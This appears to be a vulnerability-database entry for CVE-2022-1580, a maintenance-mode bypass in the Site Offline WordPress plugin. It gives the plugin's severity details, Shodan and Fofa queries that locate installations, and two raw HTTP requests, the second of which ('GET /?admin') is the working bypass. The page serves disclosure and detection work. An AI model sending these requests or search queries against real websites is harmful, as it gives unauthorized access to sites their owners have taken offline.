🔙 목록으로 돌아가기

CVE-2022-1580: Site Offline WP Plugin < 1.5.3 - Authorization Bypass

TitleSite Offline WP Plugin < 1.5.3 - Authorization Bypass
Authors4e-io
SeverityMedium
ImpactAttackers can bypass the site offline/maintenance mode by adding specific keywords to the URL query string, gaining unauthorized access to the website.
RemediationFixed in 1.5.3
CVSS Score4.3
EPSS Score0.07418
CVE IDCVE-2022-1580
CWE IDCWE-639
Shodan Queryhttp.html:/wp-content/plugins/site-offline/
Fofa Querybody=/wp-content/plugins/site-offline/
Tags cve cve2022 wpscan site-offline wordpress wp-plugin wp freehtmldesigns vuln

🔍 Vulnerability Description

The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL’s query string would bypass the plugin’s main feature.

🌐 HTTP Request

GET /wp-content/plugins/site-offline/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /?admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1580.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1580.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A